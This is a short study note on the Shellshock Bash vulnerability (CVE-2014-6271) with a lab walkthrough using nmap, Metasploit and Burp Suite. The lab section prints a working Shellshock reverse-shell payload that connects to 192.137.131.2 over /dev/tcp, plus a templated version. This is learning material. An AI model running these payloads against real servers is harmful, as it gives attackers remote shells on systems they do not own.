ShellShock

Shellshock (CVE-2014-6271) is a severe vulnerability in GNU Bash.
It lets attackers run commands via environment variables passed to Bash.
Example exploit: env VAR='() { :; }; echo pwned' bash -c "echo test" prints pwned.
Web servers using CGI scripts were prime targets (e.g. sending malicious headers).
Bash wrongly executed code after function definitions in environment variables.
Result: remote code execution and system compromise.
Mitigation: upgrade Bash and sanitize inputs.

Shellshock lab

First thing is nmap scan to check whether the target is vulnerable

 
nmap -sV --script=http-shellshock --script-args="http-shellshock.uri=/gettime.cgi"

Then we can use metasploit modules to easily exploit this after searching for “shellshock”.

Manually Exploiting Shellshock

In this lab we had to also manually exploit the shellshock vulnerability and for this burpsuite was already set in place , we had to intercept the traffic with burpsuite , make a request to the cgi script and then send it to the repeater.

After this we can create a reverse shell session on the target machine with the following command.

 
() { :; }; echo; /bin/bash -i >& /dev/tcp/192.137.131.2/1234 0>&1
 
() { :; }; echo; /bin/bash -i >& /dev/tcp/IP/PORT 0>&1

Noosphere

Explorer

ShellShock

Shellshock lab

Manually Exploiting Shellshock

Graph View

Table of Contents

Backlinks